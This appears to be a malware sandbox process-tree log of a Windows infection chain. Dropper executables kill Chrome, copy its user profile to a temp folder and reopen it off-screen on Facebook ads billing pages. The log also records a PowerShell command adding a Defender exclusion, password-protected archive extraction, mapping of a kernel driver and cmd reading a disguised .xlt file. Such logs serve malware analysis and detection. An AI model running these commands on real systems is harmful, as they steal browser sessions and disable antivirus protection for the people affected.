C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=unzip.mojom.Unzipper --field-trial-handle=1608,15940395141132829539,11884408101797472200,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=1328 /prefetch:815⤵PID:8716
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --field-trial-handle=1608,15940395141132829539,11884408101797472200,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=1892 /prefetch:815⤵PID:6940
-
-
-
-
-
-
C:\Windows\regedit.exeregedit /s chrome-set.reg11⤵
- Runs .reg file with regedit
PID:7176
-
-
C:\Users\Admin\AppData\Local\Temp\RarSFX3\parse.exeparse.exe -f json -b firefox11⤵PID:7584
-
-
C:\Users\Admin\AppData\Local\Temp\RarSFX3\parse.exeparse.exe -f json -b chrome11⤵PID:8240
-
-
C:\Users\Admin\AppData\Local\Temp\RarSFX3\parse.exeparse.exe -f json -b edge11⤵PID:8280
-
-
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\obtldkkn.phy\askinstall18.exe & exit8⤵PID:9064
-
C:\Users\Admin\AppData\Local\Temp\obtldkkn.phy\askinstall18.exeC:\Users\Admin\AppData\Local\Temp\obtldkkn.phy\askinstall18.exe9⤵PID:9172
-
C:\Windows\SysWOW64\cmd.execmd.exe /c taskkill /f /im chrome.exe10⤵PID:8488
-
C:\Windows\SysWOW64\taskkill.exetaskkill /f /im chrome.exe11⤵
- Kills process with taskkill
PID:8636
-
-
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\20vvygjs.l1y\md7_7dfj.exe & exit8⤵PID:6824
-
C:\Users\Admin\AppData\Local\Temp\20vvygjs.l1y\md7_7dfj.exeC:\Users\Admin\AppData\Local\Temp\20vvygjs.l1y\md7_7dfj.exe9⤵PID:6600
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\v2eddl5p.1mj\privacytools5.exe & exit8⤵PID:6832
-
C:\Users\Admin\AppData\Local\Temp\v2eddl5p.1mj\privacytools5.exeC:\Users\Admin\AppData\Local\Temp\v2eddl5p.1mj\privacytools5.exe9⤵PID:5100
-
C:\Users\Admin\AppData\Local\Temp\v2eddl5p.1mj\privacytools5.exeC:\Users\Admin\AppData\Local\Temp\v2eddl5p.1mj\privacytools5.exe10⤵PID:5448
-
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\n1zhompi.msj\GcleanerWW.exe /mixone & exit8⤵PID:6764
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\sb41fclw.vvw\setup.exe /8-2222 & exit8⤵PID:8372
-
C:\Users\Admin\AppData\Local\Temp\sb41fclw.vvw\setup.exeC:\Users\Admin\AppData\Local\Temp\sb41fclw.vvw\setup.exe /8-22229⤵PID:4924
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -inputformat none -outputformat none -NonInteractive -Command Add-MpPreference -ExclusionPath "C:\Program Files (x86)\Bitter-Feather"10⤵PID:9064
-
-
C:\Program Files (x86)\Bitter-Feather\7za.exe"C:\Program Files (x86)\Bitter-Feather\7za.exe" e -p154.61.71.51 winamp-plugins.7z10⤵PID:6096
-
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\system32\cmd.exe" /c ""C:\Program Files (x86)\Bitter-Feather\setup.exe" -map "C:\Program Files (x86)\Bitter-Feather\WinmonProcessMonitor.sys""10⤵PID:4668
-
C:\Program Files (x86)\Bitter-Feather\setup.exe"C:\Program Files (x86)\Bitter-Feather\setup.exe" -map "C:\Program Files (x86)\Bitter-Feather\WinmonProcessMonitor.sys"11⤵PID:4108
-
-
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\ei3fpn1u.5uu\MultitimerFour.exe & exit8⤵PID:6848
-
C:\Users\Admin\AppData\Local\Temp\ei3fpn1u.5uu\MultitimerFour.exeC:\Users\Admin\AppData\Local\Temp\ei3fpn1u.5uu\MultitimerFour.exe9⤵PID:9184
-
C:\Users\Admin\AppData\Local\Temp\0M5S61OIZW\multitimer.exe"C:\Users\Admin\AppData\Local\Temp\0M5S61OIZW\multitimer.exe" 0 306033e7ac94ccd3.87625057 0 10410⤵PID:7352
-
C:\Users\Admin\AppData\Local\Temp\0M5S61OIZW\multitimer.exe"C:\Users\Admin\AppData\Local\Temp\0M5S61OIZW\multitimer.exe" 1 3.1615299934.6047855e3a5a8 10411⤵PID:8364
-
C:\Users\Admin\AppData\Local\Temp\0M5S61OIZW\multitimer.exe"C:\Users\Admin\AppData\Local\Temp\0M5S61OIZW\multitimer.exe" 2 3.1615299934.6047855e3a5a812⤵PID:9028
-
C:\Users\Admin\AppData\Local\Temp\s2hodfolo51\askinstall24.exe"C:\Users\Admin\AppData\Local\Temp\s2hodfolo51\askinstall24.exe"13⤵PID:4380
-
C:\Windows\SysWOW64\cmd.execmd.exe /c taskkill /f /im chrome.exe14⤵PID:9204
-
C:\Windows\SysWOW64\taskkill.exetaskkill /f /im chrome.exe15⤵
- Kills process with taskkill
PID:7684
-
-
-
C:\Windows\SysWOW64\xcopy.exexcopy "C:\Users\Admin\AppData\Local\Google\Chrome\User Data" "C:\Users\Admin\AppData\Local\Temp\gcfgjfgjaa99\" /s /e /y14⤵PID:4180
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --window-position=-50000,-50000 --user-data-dir="C:\Users\Admin\AppData\Local\Temp\gcfgjfgjaa99" https://www.facebook.com/ https://www.facebook.com/pages/ https://secure.facebook.com/ads/manager/account_settings/account_billing/14⤵PID:7084
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=crashpad-handler --user-data-dir=C:\Users\Admin\AppData\Local\Temp\gcfgjfgjaa99 /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler --database=C:\Users\Admin\AppData\Local\Temp\gcfgjfgjaa99\Crashpad --metrics-dir=C:\Users\Admin\AppData\Local\Temp\gcfgjfgjaa99 --url=https://clients2.google.com/cr/report --annotation=channel= --annotation=plat=Win64 --annotation=prod=Chrome --annotation=ver=86.0.4240.111 --initial-client-data=0xec,0xf0,0xf4,0xc8,0xf8,0x7ffe20d06e00,0x7ffe20d06e10,0x7ffe20d06e2015⤵PID:6960
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --field-trial-handle=1612,10128742032751377868,816445291084413670,131072 --lang=en-US --service-sandbox-type=network --user-data-dir="C:\Users\Admin\AppData\Local\Temp\gcfgjfgjaa99" --mojo-platform-channel-handle=1684 /prefetch:815⤵PID:2828
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --field-trial-handle=1612,10128742032751377868,816445291084413670,131072 --lang=en-US --user-data-dir="C:\Users\Admin\AppData\Local\Temp\gcfgjfgjaa99" --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=6 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=2776 /prefetch:115⤵PID:2360
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --field-trial-handle=1612,10128742032751377868,816445291084413670,131072 --lang=en-US --user-data-dir="C:\Users\Admin\AppData\Local\Temp\gcfgjfgjaa99" --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=7 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=2768 /prefetch:115⤵PID:4256
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=storage.mojom.StorageService --field-trial-handle=1612,10128742032751377868,816445291084413670,131072 --lang=en-US --service-sandbox-type=utility --user-data-dir="C:\Users\Admin\AppData\Local\Temp\gcfgjfgjaa99" --mojo-platform-channel-handle=2336 /prefetch:815⤵PID:3920
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=gpu-process --field-trial-handle=1612,10128742032751377868,816445291084413670,131072 --user-data-dir="C:\Users\Admin\AppData\Local\Temp\gcfgjfgjaa99" --gpu-preferences=MAAAAAAAAADgAAAwAAAAAAAAAAAAAAAAAABgAAAAAAAQAAAAAAAAAAAAAAAAAAAAKAAAAAQAAAAgAAAAAAAAACgAAAAAAAAAMAAAAAAAAAA4AAAAAAAAABAAAAAAAAAAAAAAAAUAAAAQAAAAAAAAAAAAAAAGAAAAEAAAAAAAAAABAAAABQAAABAAAAAAAAAAAQAAAAYAAAA= --mojo-platform-channel-handle=1632 /prefetch:215⤵PID:360
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --field-trial-handle=1612,10128742032751377868,816445291084413670,131072 --lang=en-US --user-data-dir="C:\Users\Admin\AppData\Local\Temp\gcfgjfgjaa99" --extension-process --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=4 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3580 /prefetch:115⤵PID:6896
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --field-trial-handle=1612,10128742032751377868,816445291084413670,131072 --lang=en-US --user-data-dir="C:\Users\Admin\AppData\Local\Temp\gcfgjfgjaa99" --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=9 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3292 /prefetch:115⤵PID:8312
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --field-trial-handle=1612,10128742032751377868,816445291084413670,131072 --lang=en-US --user-data-dir="C:\Users\Admin\AppData\Local\Temp\gcfgjfgjaa99" --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=8 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3256 /prefetch:115⤵PID:6704
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --field-trial-handle=1612,10128742032751377868,816445291084413670,131072 --lang=en-US --service-sandbox-type=utility --user-data-dir="C:\Users\Admin\AppData\Local\Temp\gcfgjfgjaa99" --mojo-platform-channel-handle=4632 /prefetch:815⤵PID:5964
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --field-trial-handle=1612,10128742032751377868,816445291084413670,131072 --lang=en-US --service-sandbox-type=utility --user-data-dir="C:\Users\Admin\AppData\Local\Temp\gcfgjfgjaa99" --mojo-platform-channel-handle=4468 /prefetch:815⤵PID:4968
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --field-trial-handle=1612,10128742032751377868,816445291084413670,131072 --lang=en-US --service-sandbox-type=utility --user-data-dir="C:\Users\Admin\AppData\Local\Temp\gcfgjfgjaa99" --mojo-platform-channel-handle=3024 /prefetch:815⤵PID:6196
-
-
-
-
C:\Users\Admin\AppData\Local\Temp\m1comxqlx4v\vict.exe"C:\Users\Admin\AppData\Local\Temp\m1comxqlx4v\vict.exe" /VERYSILENT /id=53513⤵PID:8688
-
C:\Users\Admin\AppData\Local\Temp\is-NPQKU.tmp\vict.tmp"C:\Users\Admin\AppData\Local\Temp\is-NPQKU.tmp\vict.tmp" /SL5="$40580,870426,780800,C:\Users\Admin\AppData\Local\Temp\m1comxqlx4v\vict.exe" /VERYSILENT /id=53514⤵PID:8896
-
C:\Users\Admin\AppData\Local\Temp\is-SOHO5.tmp\wimapi.exe"C:\Users\Admin\AppData\Local\Temp\is-SOHO5.tmp\wimapi.exe" 53515⤵PID:6476
-
-
-
-
C:\Users\Admin\AppData\Local\Temp\15zldiijyh3\Setup3310.exe"C:\Users\Admin\AppData\Local\Temp\15zldiijyh3\Setup3310.exe" /Verysilent /subid=57713⤵PID:6156
-
C:\Users\Admin\AppData\Local\Temp\is-KH741.tmp\Setup3310.tmp"C:\Users\Admin\AppData\Local\Temp\is-KH741.tmp\Setup3310.tmp" /SL5="$60582,802346,56832,C:\Users\Admin\AppData\Local\Temp\15zldiijyh3\Setup3310.exe" /Verysilent /subid=57714⤵PID:7696
-
C:\Users\Admin\AppData\Local\Temp\is-B4P1P.tmp\Setup.exe"C:\Users\Admin\AppData\Local\Temp\is-B4P1P.tmp\Setup.exe" /Verysilent15⤵PID:5296
-
C:\Users\Admin\AppData\Local\Temp\is-RJHUS.tmp\Setup.tmp"C:\Users\Admin\AppData\Local\Temp\is-RJHUS.tmp\Setup.tmp" /SL5="$60298,138429,56832,C:\Users\Admin\AppData\Local\Temp\is-B4P1P.tmp\Setup.exe" /Verysilent16⤵PID:2232
-
C:\Users\Admin\AppData\Local\Temp\is-2FQOM.tmp\PictureLAb.exe"C:\Users\Admin\AppData\Local\Temp\is-2FQOM.tmp\PictureLAb.exe" /Verysilent17⤵PID:416
-
C:\Users\Admin\AppData\Local\Temp\is-FHVML.tmp\PictureLAb.tmp"C:\Users\Admin\AppData\Local\Temp\is-FHVML.tmp\PictureLAb.tmp" /SL5="$2034C,1574549,56832,C:\Users\Admin\AppData\Local\Temp\is-2FQOM.tmp\PictureLAb.exe" /Verysilent18⤵PID:7304
-
C:\Users\Admin\AppData\Local\Temp\is-3373J.tmp\Setup.exe"C:\Users\Admin\AppData\Local\Temp\is-3373J.tmp\Setup.exe" /VERYSILENT19⤵PID:6564
-
C:\Users\Admin\AppData\Local\Temp\is-JKCG6.tmp\Setup.tmp"C:\Users\Admin\AppData\Local\Temp\is-JKCG6.tmp\Setup.tmp" /SL5="$205F8,298255,214528,C:\Users\Admin\AppData\Local\Temp\is-3373J.tmp\Setup.exe" /VERYSILENT20⤵PID:8228
-
C:\Users\Admin\AppData\Local\Temp\is-BAD66.tmp\def.exe"C:\Users\Admin\AppData\Local\Temp\is-BAD66.tmp\def.exe" /S /UID=lab21421⤵PID:9128
-
C:\Users\Admin\AppData\Local\Temp\05-e39c0-019-349b7-d68e7f9481a16\Bopaebaeluxae.exe"C:\Users\Admin\AppData\Local\Temp\05-e39c0-019-349b7-d68e7f9481a16\Bopaebaeluxae.exe"22⤵PID:6252
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\0rxcflkm.0p3\lod.exe & exit23⤵PID:8516
-
C:\Users\Admin\AppData\Local\Temp\0rxcflkm.0p3\lod.exeC:\Users\Admin\AppData\Local\Temp\0rxcflkm.0p3\lod.exe24⤵PID:5376
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" /c echo HQxchYwhQ25⤵PID:7768
-
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" /c cmd < Riconobbe.xlt25⤵PID:8532
-
C:\Windows\SysWOW64\cmd.execmd26⤵PID:6804
-
-
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\42tlv5yi.hx5\customer4.exe & exit23⤵PID:8140
-
C:\Users\Admin\AppData\Local\Temp\42tlv5yi.hx5\customer4.exeC:\Users\Admin\AppData\Local\Temp\42tlv5yi.hx5\customer4.exe24⤵PID:636
-
C:\Users\Admin\AppData\Local\Temp\RarSFX4\main.exe"C:\Users\Admin\AppData\Local\Temp\RarSFX4\main.exe"25⤵PID:7708
-
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\hut2mhaz.1ck\askinstall18.exe & exit23⤵PID:4908
-
C:\Users\Admin\AppData\Local\Temp\hut2mhaz.1ck\askinstall18.exeC:\Users\Admin\AppData\Local\Temp\hut2mhaz.1ck\askinstall18.exe24⤵PID:6132
-
C:\Windows\SysWOW64\cmd.execmd.exe /c taskkill /f /im chrome.exe25⤵PID:7208
-
C:\Windows\SysWOW64\taskkill.exetaskkill /f /im chrome.exe26⤵
- Kills process with taskkill
PID:9012
-
-
-
C:\Windows\SysWOW64\xcopy.exexcopy "C:\Users\Admin\AppData\Local\Google\Chrome\User Data" "C:\Users\Admin\AppData\Local\Temp\mfhsghshee99\" /s /e /y25⤵PID:6036
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --window-position=-50000,-50000 --user-data-dir="C:\Users\Admin\AppData\Local\Temp\mfhsghshee99" https://www.facebook.com/ https://www.facebook.com/pages/ https://secure.facebook.com/ads/manager/account_settings/account_billing/25⤵PID:744
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=crashpad-handler --user-data-dir=C:\Users\Admin\AppData\Local\Temp\mfhsghshee99 /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler --database=C:\Users\Admin\AppData\Local\Temp\mfhsghshee99\Crashpad --metrics-dir=C:\Users\Admin\AppData\Local\Temp\mfhsghshee99 --url=https://clients2.google.com/cr/report --annotation=channel= --annotation=plat=Win64 --annotation=prod=Chrome --annotation=ver=86.0.4240.111 --initial-client-data=0xec,0xf0,0xf4,0xc8,0xf8,0x7ffe20d06e00,0x7ffe20d06e10,0x7ffe20d06e2026⤵PID:5628
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=storage.mojom.StorageService --field-trial-handle=1800,3291693410281511131,5785113602913820419,131072 --lang=en-US --service-sandbox-type=utility --user-data-dir="C:\Users\Admin\AppData\Local\Temp\mfhsghshee99" --mojo-platform-channel-handle=1920 /prefetch:826⤵PID:6672
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --field-trial-handle=1800,3291693410281511131,5785113602913820419,131072 --lang=en-US --service-sandbox-type=network --user-data-dir="C:\Users\Admin\AppData\Local\Temp\mfhsghshee99" --mojo-platform-channel-handle=1904 /prefetch:826⤵PID:2836
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=gpu-process --field-trial-handle=1800,3291693410281511131,5785113602913820419,131072 --user-data-dir="C:\Users\Admin\AppData\Local\Temp\mfhsghshee99" --gpu-preferences=MAAAAAAAAADgAAAwAAAAAAAAAAAAAAAAAABgAAAAAAAQAAAAAAAAAAAAAAAAAAAAKAAAAAQAAAAgAAAAAAAAACgAAAAAAAAAMAAAAAAAAAA4AAAAAAAAABAAAAAAAAAAAAAAAAUAAAAQAAAAAAAAAAAAAAAGAAAAEAAAAAAAAAABAAAABQAAABAAAAAAAAAAAQAAAAYAAAA= --mojo-platform-channel-handle=1828 /prefetch:226⤵PID:8248
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --field-trial-handle=1800,3291693410281511131,5785113602913820419,131072 --lang=en-US --user-data-dir="C:\Users\Admin\AppData\Local\Temp\mfhsghshee99" --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=6 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=2816 /prefetch:126⤵PID:5440
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --field-trial-handle=1800,3291693410281511131,5785113602913820419,131072 --lang=en-US --user-data-dir="C:\Users\Admin\AppData\Local\Temp\mfhsghshee99" --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=7 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=2808 /prefetch:126⤵PID:8872
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --field-trial-handle=1800,3291693410281511131,5785113602913820419,131072 --lang=en-US --user-data-dir="C:\Users\Admin\AppData\Local\Temp\mfhsghshee99" --extension-process --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=2 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3500 /prefetch:126⤵PID:5084
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --field-trial-handle=1800,3291693410281511131,5785113602913820419,131072 --lang=en-US --user-data-dir="C:\Users\Admin\AppData\Local\Temp\mfhsghshee99" --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=9 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3332 /prefetch:126⤵PID:7824
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --field-trial-handle=1800,3291693410281511131,5785113602913820419,131072 --lang=en-US --user-data-dir="C:\Users\Admin\AppData\Local\Temp\mfhsghshee99" --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=8 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3212 /prefetch:126⤵PID:4336
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --field-trial-handle=1800,3291693410281511131,5785113602913820419,131072 --lang=en-US --service-sandbox-type=utility --user-data-dir="C:\Users\Admin\AppData\Local\Temp\mfhsghshee99" --mojo-platform-channel-handle=4624 /prefetch:826⤵PID:8764
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --field-trial-handle=1800,3291693410281511131,5785113602913820419,131072 --lang=en-US --service-sandbox-type=utility --user-data-dir="C:\Users\Admin\AppData\Local\Temp\mfhsghshee99" --mojo-platform-channel-handle=4444 /prefetch:826⤵PID:8120
-
-
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\eqpwmsz2.bgc\md7_7dfj.exe & exit23⤵PID:7272
-
C:\Users\Admin\AppData\Local\Temp\eqpwmsz2.bgc\md7_7dfj.exeC:\Users\Admin\AppData\Local\Temp\eqpwmsz2.bgc\md7_7dfj.exe24⤵PID:4516
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\cb2bqmly.yc1\privacytools5.exe & exit23⤵PID:1688
-
C:\Users\Admin\AppData\Local\Temp\cb2bqmly.yc1\privacytools5.exeC:\Users\Admin\AppData\Local\Temp\cb2bqmly.yc1\privacytools5.exe24⤵PID:5248
-
C:\Users\Admin\AppData\Local\Temp\cb2bqmly.yc1\privacytools5.exeC:\Users\Admin\AppData\Local\Temp\cb2bqmly.yc1\privacytools5.exe25⤵PID:6544
-
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\powcqean.ksz\GcleanerWW.exe /mixone & exit23⤵PID:6512
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\sznaxexf.fux\setup.exe /8-2222 & exit23⤵PID:6264
-
C:\Users\Admin\AppData\Local\Temp\sznaxexf.fux\setup.exeC:\Users\Admin\AppData\Local\Temp\sznaxexf.fux\setup.exe /8-222224⤵PID:8136
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -inputformat none -outputformat none -NonInteractive -Command Add-MpPreference -ExclusionPath "C:\Program Files (x86)\Frosty-Sunset"25⤵PID:5900
-
-
C:\Program Files (x86)\Frosty-Sunset\7za.exe"C:\Program Files (x86)\Frosty-Sunset\7za.exe" e -p154.61.71.51 winamp-plugins.7z25⤵PID:7024
-
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\system32\cmd.exe" /c ""C:\Program Files (x86)\Frosty-Sunset\setup.exe" -map "C:\Program Files (x86)\Frosty-Sunset\WinmonProcessMonitor.sys""25⤵PID:5124
-
C:\Program Files (x86)\Frosty-Sunset\setup.exe"C:\Program Files (x86)\Frosty-Sunset\setup.exe" -map "C:\Program Files (x86)\Frosty-Sunset\WinmonProcessMonitor.sys"26⤵PID:9232
-
-
-
C:\Program Files (x86)\Frosty-Sunset\7za.exe"C:\Program Files (x86)\Frosty-Sunset\7za.exe" e -p154.61.71.51 winamp.7z25⤵PID:9828
-
-
C:\Program Files (x86)\Frosty-Sunset\setup.exe"C:\Program Files (x86)\Frosty-Sunset\setup.exe" /8-222225⤵PID:9704
-
C:\Program Files (x86)\Frosty-Sunset\setup.exe"C:\Program Files (x86)\Frosty-Sunset\setup.exe" /8-222226⤵PID:11764
-
-
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\13f1kaqz.32m\MultitimerFour.exe & exit23⤵PID:6376
-
C:\Users\Admin\AppData\Local\Temp\13f1kaqz.32m\MultitimerFour.exeC:\Users\Admin\AppData\Local\Temp\13f1kaqz.32m\MultitimerFour.exe24⤵PID:8064
-
C:\Users\Admin\AppData\Local\Temp\BCM93ONTNT\multitimer.exe"C:\Users\Admin\AppData\Local\Temp\BCM93ONTNT\multitimer.exe" 0 306033e7ac94ccd3.87625057 0 10425⤵PID:8344
-
C:\Users\Admin\AppData\Local\Temp\BCM93ONTNT\multitimer.exe"C:\Users\Admin\AppData\Local\Temp\BCM93ONTNT\multitimer.exe" 1 3.1615300029.604785bd831ca 10426⤵PID:6552
-
C:\Users\Admin\AppData\Local\Temp\BCM93ONTNT\multitimer.exe"C:\Users\Admin\AppData\Local\Temp\BCM93ONTNT\multitimer.exe" 2 3.1615300029.604785bd831ca27⤵PID:8576
-
C:\Users\Admin\AppData\Local\Temp\fbyfjlisqda\vict.exe"C:\Users\Admin\AppData\Local\Temp\fbyfjlisqda\vict.exe" /VERYSILENT /id=53528⤵PID:7900
-
C:\Users\Admin\AppData\Local\Temp\is-7F543.tmp\vict.tmp"C:\Users\Admin\AppData\Local\Temp\is-7F543.tmp\vict.tmp" /SL5="$40690,870426,780800,C:\Users\Admin\AppData\Local\Temp\fbyfjlisqda\vict.exe" /VERYSILENT /id=53529⤵PID:7104
-
C:\Users\Admin\AppData\Local\Temp\is-JV4DA.tmp\wimapi.exe"C:\Users\Admin\AppData\Local\Temp\is-JV4DA.tmp\wimapi.exe" 53530⤵PID:4312
-
-
-
-
C:\Users\Admin\AppData\Local\Temp\gbs4ntvcevl\askinstall24.exe"C:\Users\Admin\AppData\Local\Temp\gbs4ntvcevl\askinstall24.exe"28⤵PID:4424
-
C:\Windows\SysWOW64\cmd.execmd.exe /c taskkill /f /im chrome.exe29⤵PID:5352
-
C:\Windows\SysWOW64\taskkill.exetaskkill /f /im chrome.exe30⤵
- Kills process with taskkill
PID:6376
-
-
-
C:\Windows\SysWOW64\xcopy.exexcopy "C:\Users\Admin\AppData\Local\Google\Chrome\User Data" "C:\Users\Admin\AppData\Local\Temp\gcfgjfgjaa99\" /s /e /y29⤵PID:9752
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --window-position=-50000,-50000 --user-data-dir="C:\Users\Admin\AppData\Local\Temp\gcfgjfgjaa99" https://www.facebook.com/ https://www.facebook.com/pages/ https://secure.facebook.com/ads/manager/account_settings/account_billing/29⤵PID:9340
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=crashpad-handler --user-data-dir=C:\Users\Admin\AppData\Local\Temp\gcfgjfgjaa99 /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler --database=C:\Users\Admin\AppData\Local\Temp\gcfgjfgjaa99\Crashpad --metrics-dir=C:\Users\Admin\AppData\Local\Temp\gcfgjfgjaa99 --url=https://clients2.google.com/cr/report --annotation=channel= --annotation=plat=Win64 --annotation=prod=Chrome --annotation=ver=86.0.4240.111 --initial-client-data=0xec,0xf0,0xf4,0xc8,0xf8,0x7ffe20d06e00,0x7ffe20d06e10,0x7ffe20d06e2030⤵PID:8384
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=storage.mojom.StorageService --field-trial-handle=1648,9381904308218835470,15790962909475309305,131072 --lang=en-US --service-sandbox-type=utility --user-data-dir="C:\Users\Admin\AppData\Local\Temp\gcfgjfgjaa99" --mojo-platform-channel-handle=2292 /prefetch:830⤵PID:9840
-
-
